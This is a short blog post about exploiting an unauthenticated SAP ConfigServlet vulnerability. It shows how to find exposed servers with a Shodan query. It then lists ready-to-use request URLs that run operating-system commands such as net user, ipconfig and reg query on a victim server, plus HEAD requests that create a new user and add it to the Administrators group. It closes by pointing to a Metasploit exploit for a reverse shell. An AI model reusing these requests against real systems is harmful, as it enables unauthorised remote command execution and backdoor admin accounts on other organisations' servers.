Last week, Dmitry Chastuchin, Principal Researcher ERPScan published vulnerabilities on SAP.

SAP is the most popular business application. More than 180000 customers worldwide have it.

Companies like Nike, Coca-Cola, Sony working... with SAP systems

In this post, we are going to talk about how we can exploit this weaknesses.

First of all, we need to locate possibles SAP vulnerables servers. As usual, we are going to use Shodan.

http://www.shodanhq.com/search?q=%2Firj%2Fportal+50000



Then, we are going to execute commands on the SAP server through our web browser using the nexts URL queries without authentication.
http://xxxx.xxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=tasklist

We can see the running processes on the server




We can see/edit the Windows Server Registry.
http://xxxx.xxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=reg query hkcu\console\



We can see the network interfaces.
http://xxxx.xxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig /all



We can malke a traceroute in order to discover the network where SAP server is hosted.
http://xxxx.xxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=tracert www.google.com



We can see all operating system users.
http://xxxx.xxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=net user



We can show his arp table.
http://xxxx.xxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=arp%20-a



We actually do a ping against servers in the same network.
http://xxxx.xxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ping%2010.100.8.221



Another great discovery is to create an administrator SAP user across HEAD posts...

HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=blabla,PASSWORD=blabla

HEAD /ctc/ConfigServlet?para=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME=blabla,GROUPNAME=Administrators





In 2013-04-25 Andras Kabai published an exploit. You can run this exploit with Metasploit, upload a payload, get a reverse shell and take the control over the SAP server.

You can download the exploit called "SAP ConfigServlet Remote Unauthenticated Payload Execution" here: http://www.exploit-db.com/exploits/24996/




Finally you can see the original document here.